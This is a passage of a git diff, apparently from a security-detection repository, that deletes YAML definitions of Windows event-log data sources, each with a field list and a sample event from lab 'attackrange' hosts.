-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-ProcessExitMonitor' Guid='{FD771D53-8492-4057-8E35-8C02813AF49B}' EventSourceName='Process Exit Monitor'/><EventID Qualifiers='16384'>3000</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x80000000000000</Keywords><TimeCreated SystemTime='2022-09-08T18:21:27.155712000Z'/><EventRecordID>21334</EventRecordID><Correlation/><Execution ProcessID='0' ThreadID='0'/><Channel>Application</Channel><Computer>win-host-mhaag-attack-range-117</Computer><Security UserID='S-1-5-21-62830434-419094169-3251522898-500'/></System><EventData Name='EVENT_PROCESSTERMINATION_SELF'><Data Name='param1'>C:\Windows\System32\klist.exe</Data><Data Name='param2'>0</Data><Data Name='param3'>01d8c3afcf370d13</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_70.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_70.yml
deleted file mode 100644
index d66fa4dd45..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_70.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-event_name: Windows Event Log CAPI2 70
-fields:
-- _time
-- Channel
-- Computer
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-CAPI2' Guid='{5bbca4a8-b209-48dc-a8c7-b23d3e5216fb}'/><EventID>70</EventID><Version>0</Version><Level>4</Level><Task>70</Task><Opcode>0</Opcode><Keywords>0x4000000000000080</Keywords><TimeCreated SystemTime='2023-02-09T20:57:21.815339400Z'/><EventRecordID>308332</EventRecordID><Correlation/><Execution ProcessID='3680' ThreadID='212'/><Channel>Microsoft-Windows-CAPI2/Operational</Channel><Computer>win-dc-mhaag-attack-range-84.attackrange.local</Computer><Security UserID='S-1-5-21-2690122726-1172718210-436210976-500'/></System><UserData><CryptAcquireCertificatePrivateKey><Certificate fileRef='5A752C9207730D787A9AF0A11FDFD59F68A6EB8C.cer' subjectName='test.atomic.com'/><Flags value='10001' CRYPT_ACQUIRE_CACHE_FLAG='true' CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG='true'/><EventAuxInfo ProcessName='rundll32.exe'/><CorrelationAuxInfo TaskId='{09F7E1D8-FE03-4AFA-8B1F-A38A574E44C9}' SeqNumber='2'/><Result value='0'/></CryptAcquireCertificatePrivateKey></UserData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_81.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_81.yml
deleted file mode 100644
index 898b2ab481..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_81.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-event_name: Windows Event Log CAPI2 81
-fields:
-- _time
-- Channel
-- Computer
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-CAPI2' Guid='{5bbca4a8-b209-48dc-a8c7-b23d3e5216fb}'/><EventID>81</EventID><Version>0</Version><Level>2</Level><Task>80</Task><Opcode>2</Opcode><Keywords>0x4000000000000040</Keywords><TimeCreated SystemTime='2023-10-10T21:05:45.047550700Z'/><EventRecordID>2400597</EventRecordID><Correlation/><Execution ProcessID='2424' ThreadID='2868'/><Channel>Microsoft-Windows-CAPI2/Operational</Channel><Computer>mswin-server.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><UserData><WinVerifyTrust><ActionID>{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}</ActionID><UIChoice value='2'>WTD_UI_NONE</UIChoice><RevocationCheck value='0'/><StateAction value='1'>WTD_STATEACTION_VERIFY</StateAction><Flags value='80001000' WTD_CACHE_ONLY_URL_RETRIEVAL='true' CPD_USE_NT5_CHAIN_FLAG='true'/><FileInfo filePath='C:\Users\Administrator\Downloads\metatwin-master\metatwin-master\20231010_210331\20231010_210331_signed_mimikatz.exe' hasFileHandle='true'/><DigestInfo digestAlgorithm='SHA256' digest='140E97430439F7B8E2332E928581996A701C28D3D33FBC80BCAA2F731F9FEE8D'/><RegPolicySetting value='23C00' WTPF_OFFLINEOK_IND='true' WTPF_OFFLINEOK_COM='true' WTPF_OFFLINEOKNBU_IND='true' WTPF_OFFLINEOKNBU_COM='true' WTPF_IGNOREREVOCATIONONTS='true'/><SignatureSettingsFlags value='20000000' WSS_OUT_FILE_SUPPORTS_SEAL='true'/><SignerInfo><DigestAlgorithm oid='2.16.840.1.101.3.4.2.1' hashName='SHA256'/></SignerInfo><CertificateChain chainRef='{D7D21F37-6E0D-440C-9DF2-E73BC40CD4BF}'/><TimestampInfo format='RFC 3161'><DigestAlgorithm oid='2.16.840.1.101.3.4.2.1' hashName='SHA256'/><SignTime>2021-01-07T23:21:42.655Z</SignTime></TimestampInfo><TimestampChain chainRef='{2BDF7F75-D825-45BA-BC57-1F5E52274842}'/><StepError stepID='32' stepName='TRUSTERROR_STEP_FINAL_OBJPROV'><Result value='80096010'>The digital signature of the object did not verify.</Result></StepError><EventAuxInfo ProcessName='sysmon64.exe'/><CorrelationAuxInfo TaskId='{44B713F2-FA74-49B2-B3C1-99E5FD2F1667}' SeqNumber='9'/><Result value='80096010'>The digital signature of the object did not verify.</Result></WinVerifyTrust></UserData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_CertificateServicesClient_1007.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_CertificateServicesClient_1007.yml
deleted file mode 100644
index d54bcba5a6..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_CertificateServicesClient_1007.yml
+++ /dev/null
@@ -1,51 +0,0 @@
-event_name: Windows Event Log CertificateServicesClient 1007
-fields:
-- _time
-- ActivityID
-- Channel
-- Computer
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-CertificateServicesClient-Lifecycle-System' Guid='{bc0669e1-a10d-4a78-834e-1ca3c806c93b}'/><EventID>1007</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2023-02-01T17:08:44.1466587Z'/><EventRecordID>2</EventRecordID><Correlation ActivityID='{3b615f97-365d-0000-130d-623b5d36d901}'/><Execution ProcessID='7716' ThreadID='8384'/><Channel>Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational</Channel><Computer>DESKTOP-92OQLA1</Computer><Security UserID='S-1-5-21-2334826781-4204571024-2242252149-1000'/></System><UserData><CertNotificationData ProcessName='powershell.exe' AccountName='DESKTOP-92OQLA1\Michael Haag' Context='Machine'><CertificateDetails Thumbprint='1ee3cb11c0937a0940d8633fbece475b76a04833'><SubjectNames><SubjectName>CN=test.atomic.com</SubjectName><SubjectName>test.atomic.com</SubjectName></SubjectNames><EKUs><EKU Name='Client Authentication' OID='1.3.6.1.5.5.7.3.2'/><EKU Name='Server Authentication' OID='1.3.6.1.5.5.7.3.1'/></EKUs><NotValidAfter>2024-02-01T17:18:09Z</NotValidAfter></CertificateDetails></CertNotificationData></UserData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1121.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1121.yml
deleted file mode 100644
index 493b18802f..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1121.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-event_name: Windows Event Log Defender 1121
-fields:
-- _time
-- ActivityID
-- Channel
-- Computer
-- Detection_Time
-- Engine_Version
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- ID
-- Inhertiance_Flags
-- Involved_File
-- Keywords
-- Level
-- Name
-- New_Value
-- Old_Value
-- Opcode
-- Parent_Commandline
-- Path
-- ProcessID
-- Process_Name
-- Product_Name
-- Product_Version
-- RecordNumber
-- RuleType
-- Security_intelligence_Version
-- SystemTime
-- System_Props_Xml
-- Target_Commandline
-- Task
-- ThreadID
-- User
-- UserID
-- Version
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Windows Defender' Guid='{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}'/><EventID>1121</EventID><Version>0</Version><Level>3</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2023-11-20T16:29:48.9847638Z'/><EventRecordID>2975</EventRecordID><Correlation ActivityID='{fb36f2d9-5b89-4566-8af5-7c1212b4797f}'/><Execution ProcessID='3488' ThreadID='7496'/><Channel>Microsoft-Windows-Windows Defender/Operational</Channel><Computer>researchvmhaa</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='Product Name'>Microsoft Defender Antivirus</Data><Data Name='Product Version'>4.18.23100.2009</Data><Data Name='Unused'></Data><Data Name='ID'>3B576869-A4EC-4529-8536-B80A7769E899</Data><Data Name='Detection Time'>2023-11-20T16:29:48.984Z</Data><Data Name='User'>researchvmhaa\research</Data><Data Name='Path'>C:\Users\research\AppData\Local\Temp\script.vbs</Data><Data Name='Process Name'>C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data><Data Name='Security intelligence Version'>1.401.912.0</Data><Data Name='Engine Version'>1.1.23100.2009</Data><Data Name='RuleType'>ENT\ConsR</Data><Data Name='Target Commandline'></Data><Data Name='Parent Commandline'>"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" </Data><Data Name='Involved File'></Data><Data Name='Inhertiance Flags'>0x00000000</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1122.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1122.yml
deleted file mode 100644
index f7448276f1..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1122.yml
+++ /dev/null
@@ -1,55 +0,0 @@
-event_name: Windows Event Log Defender 1122
-fields:
-- _time
-- ActivityID
-- Channel
-- Computer
-- Detection_Time
-- Engine_Version
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- ID
-- Inhertiance_Flags
-- Keywords
-- Level
-- Name
-- Opcode
-- Parent_Commandline
-- Path
-- ProcessID
-- Process_Name
-- Product_Name
-- Product_Version
-- RecordNumber
-- RuleType
-- Security_intelligence_Version
-- SystemTime
-- System_Props_Xml
-- Target_Commandline
-- Task
-- ThreadID
-- User
-- UserID
-- Version
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Windows Defender' Guid='{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}'/><EventID>1122</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2023-11-26T23:43:08.7101401Z'/><EventRecordID>3701</EventRecordID><Correlation ActivityID='{b68511a1-ec5f-4bc7-a9bb-2bd601338de2}'/><Execution ProcessID='3512' ThreadID='5936'/><Channel>Microsoft-Windows-Windows Defender/Operational</Channel><Computer>researchvmhaa</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='Product Name'>Microsoft Defender Antivirus</Data><Data Name='Product Version'>4.18.23100.2009</Data><Data Name='Unused'></Data><Data Name='ID'>E6DB77E5-3DF2-4CF1-B95A-636979351E5B</Data><Data Name='Detection Time'>2023-11-26T23:43:08.709Z</Data><Data Name='User'>(unknown user)</Data><Data Name='Path'></Data><Data Name='Process Name'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='Security intelligence Version'>1.401.1247.0</Data><Data Name='Engine Version'>1.1.23100.2009</Data><Data Name='RuleType'>ENT\ConsR</Data><Data Name='Target Commandline'></Data><Data Name='Parent Commandline'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='Involved File'></Data><Data Name='Inhertiance Flags'>0x00000000</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_5007.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_5007.yml
deleted file mode 100644
index facedb79bd..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_5007.yml
+++ /dev/null
@@ -1,45 +0,0 @@
-event_name: Windows Event Log Defender 5007
-fields:
-- _time
-- Channel
-- Computer
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- New_Value
-- Old_Value
-- Opcode
-- ProcessID
-- Product_Name
-- Product_Version
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserID
-- Version
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Windows Defender' Guid='{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}'/><EventID>5007</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2023-11-27T10:39:16.1740105Z'/><EventRecordID>3726</EventRecordID><Correlation/><Execution ProcessID='3512' ThreadID='5936'/><Channel>Microsoft-Windows-Windows Defender/Operational</Channel><Computer>researchvmhaa</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='Product Name'>Microsoft Defender Antivirus</Data><Data Name='Product Version'>4.18.23100.2009</Data><Data Name='Old Value'>HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1</Data><Data Name='New Value'></Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_RemoteConnectionManager_1149.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_RemoteConnectionManager_1149.yml
deleted file mode 100644
index c67919db56..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_RemoteConnectionManager_1149.yml
+++ /dev/null
@@ -1,42 +0,0 @@
-event_name: Windows Event Log RemoteConnectionManager 1149
-fields:
-- _time
-- ActivityID
-- Channel
-- Computer
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- UserID
-- Version
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-TerminalServices-RemoteConnectionManager' Guid='{c76baa63-ae81-421c-b425-340b4b24157f}'/><EventID>1149</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x1000000000000000</Keywords><TimeCreated SystemTime='2024-04-11T00:54:59.678287300Z'/><EventRecordID>2064</EventRecordID><Correlation ActivityID='{f42005b9-c322-4bd9-962e-c985c22d0000}'/><Execution ProcessID='468' ThreadID='968'/><Channel>Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational</Channel><Computer>ar-win-1.attackrange.local</Computer><Security UserID='S-1-5-20'/></System><UserData><EventXML xmlns='Event_NS'><Param1>Administrator</Param1><Param2>ATTACKRANGE</Param2><Param3>10.0.1.14</Param3></EventXML></UserData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1100.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1100.yml
deleted file mode 100644
index d9d4b79003..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1100.yml
+++ /dev/null
@@ -1,64 +0,0 @@
-event_name: Windows Event Log Security 1100
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- service
-- service_name
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Eventlog' Guid='{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}'/><EventID>1100</EventID><Version>0</Version><Level>4</Level><Task>103</Task><Opcode>0</Opcode><Keywords>0x4020000000000000</Keywords><TimeCreated SystemTime='2024-04-08T18:48:10.378485000Z'/><EventRecordID>140874</EventRecordID><Correlation/><Execution ProcessID='1108' ThreadID='4884'/><Channel>Security</Channel><Computer>ar-win-2</Computer><Security/></System><UserData><ServiceShutdown xmlns='http://manifests.microsoft.com/win/2004/08/windows/eventlog'></ServiceShutdown></UserData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1102.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1102.yml
deleted file mode 100644
index 00f11c83cb..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1102.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: Windows Event Log Security 1102
-fields:
-- _time
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- LogFileCleared_Xml
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-field_mappings:
-  - data_model: ocsf
-    mapping:
-      Computer: device.hostname
-      EventID: metadata.event_code
-      SystemTime: metadata.original_time
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Eventlog' Guid='{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}'/><EventID>1102</EventID><Version>0</Version><Level>4</Level><Task>104</Task><Opcode>0</Opcode><Keywords>0x4020000000000000</Keywords><TimeCreated SystemTime='2024-03-05T09:18:29.313328400Z'/><EventRecordID>1826166</EventRecordID><Correlation/><Execution ProcessID='412' ThreadID='1072'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><UserData><LogFileCleared xmlns='http://manifests.microsoft.com/win/2004/08/windows/eventlog'><SubjectUserSid>ATTACKRANGE\Administrator</SubjectUserSid><SubjectUserName>Administrator</SubjectUserName><SubjectDomainName>ATTACKRANGE</SubjectDomainName><SubjectLogonId>0x34a3a27</SubjectLogonId></LogFileCleared></UserData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4624.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4624.yml
deleted file mode 100644
index 36ac809122..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4624.yml
+++ /dev/null
@@ -1,107 +0,0 @@
-event_name: Windows Event Log Security 4624
-fields:
-- _time
-- ActivityID
-- AuthenticationPackageName
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- ElevatedToken
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- ImpersonationLevel
-- IpAddress
-- IpPort
-- KeyLength
-- Keywords
-- Level
-- LmPackageName
-- LogonGuid
-- LogonProcessName
-- LogonType
-- Logon_ID
-- Logon_Type
-- Name
-- Opcode
-- ProcessID
-- ProcessId
-- ProcessName
-- RecordNumber
-- RestrictedAdminMode
-- Source_Port
-- Source_Workstation
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetLinkedLogonId
-- TargetLogonId
-- TargetOutboundDomainName
-- TargetOutboundUserName
-- TargetUserName
-- TargetUserSid
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- TransmittedServices
-- Version
-- VirtualAccount
-- WorkstationName
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- process
-- process_id
-- process_name
-- process_path
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_ip
-- src_port
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::app
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4624</EventID><Version>2</Version><Level>0</Level><Task>12544</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2023-03-23T19:15:28.337312500Z'/><EventRecordID>371886</EventRecordID><Correlation ActivityID='{64015806-5D92-0000-1258-0164925DD901}'/><Execution ProcessID='596' ThreadID='2428'/><Channel>Security</Channel><Computer>ar-win-7.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>NULL SID</Data><Data Name='SubjectUserName'>-</Data><Data Name='SubjectDomainName'>-</Data><Data Name='SubjectLogonId'>0x0</Data><Data Name='TargetUserSid'>ATTACKRANGE\ELMER_SALAS</Data><Data Name='TargetUserName'>ELMER_SALAS</Data><Data Name='TargetDomainName'>ATTACKRANGE.LOCAL</Data><Data Name='TargetLogonId'>0x693ef4</Data><Data Name='LogonType'>3</Data><Data Name='LogonProcessName'>Kerberos</Data><Data Name='AuthenticationPackageName'>Kerberos</Data><Data Name='WorkstationName'>-</Data><Data Name='LogonGuid'>{139F7D70-0163-38CC-676D-00AE04A0F19C}</Data><Data Name='TransmittedServices'>-</Data><Data Name='LmPackageName'>-</Data><Data Name='KeyLength'>0</Data><Data Name='ProcessId'>0x0</Data><Data Name='ProcessName'>-</Data><Data Name='IpAddress'>10.0.1.16</Data><Data Name='IpPort'>49980</Data><Data Name='ImpersonationLevel'>%%1833</Data><Data Name='RestrictedAdminMode'>-</Data><Data Name='TargetOutboundUserName'>-</Data><Data Name='TargetOutboundDomainName'>-</Data><Data Name='VirtualAccount'>%%1843</Data><Data Name='TargetLinkedLogonId'>0x0</Data><Data Name='ElevatedToken'>%%1843</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4625.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4625.yml
deleted file mode 100644
index d44f1d469a..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4625.yml
+++ /dev/null
@@ -1,126 +0,0 @@
-event_name: Windows Event Log Security 4625
-fields:
-- _time
-- ActivityID
-- AuthenticationPackageName
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- FailureReason
-- Guid
-- IpAddress
-- IpPort
-- KeyLength
-- Keywords
-- Level
-- LmPackageName
-- LogonProcessName
-- LogonType
-- Logon_ID
-- Logon_Type
-- Name
-- Opcode
-- ProcessID
-- ProcessId
-- ProcessName
-- RecordNumber
-- Source_Port
-- Source_Workstation
-- Status
-- SubStatus
-- Sub_Status
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetUserName
-- TargetUserSid
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- TransmittedServices
-- Version
-- WorkstationName
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- process
-- process_id
-- process_name
-- process_path
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_ip
-- src_port
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::app
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-field_mappings:
-  - data_model: ocsf
-    mapping:
-      ProcessName: actor.process.file
-      LogonProcessName: logon_process.name
-      ProcessId: actor.process.pid
-      AuthenticationPackageName: auth_protocol
-      IpAddress: src_endpoint.ip
-      IpPort: src_endpoint.port
-      LogonType: logon_type_id
-      TargetDomainName: user.domain
-      TargetUserName: user.name
-      TargetUserSid: user.uid
-      SubjectDomainName: actor.user.domain
-      SubjectUserName: actor.user.name
-      SubjectLogonId: actor.session.uid
-      SubjectUserSid: actor.user.uid
-      WorkstationName: src_endpoint.name
-      EventID: metadata.event_code
-      Name: metadata.log_provider
-      EventRecordID: metadata.sequence
-      Computer: device.hostname
-      SystemTime: metadata.original_time
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4625</EventID><Version>0</Version><Level>0</Level><Task>12544</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated SystemTime='2023-03-22T20:25:15.594676400Z'/><EventRecordID>367348</EventRecordID><Correlation ActivityID='{6C54D781-5C05-0000-8CD7-546C055CD901}'/><Execution ProcessID='588' ThreadID='3564'/><Channel>Security</Channel><Computer>ar-win-8.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>NULL SID</Data><Data Name='SubjectUserName'>-</Data><Data Name='SubjectDomainName'>-</Data><Data Name='SubjectLogonId'>0x0</Data><Data Name='TargetUserSid'>NULL SID</Data><Data Name='TargetUserName'>Administrator</Data><Data Name='TargetDomainName'>builtin</Data><Data Name='Status'>0xc000006d</Data><Data Name='FailureReason'>%%2313</Data><Data Name='SubStatus'>0xc000006a</Data><Data Name='LogonType'>3</Data><Data Name='LogonProcessName'>NtLmSsp </Data><Data Name='AuthenticationPackageName'>NTLM</Data><Data Name='WorkstationName'>-</Data><Data Name='TransmittedServices'>-</Data><Data Name='LmPackageName'>-</Data><Data Name='KeyLength'>0</Data><Data 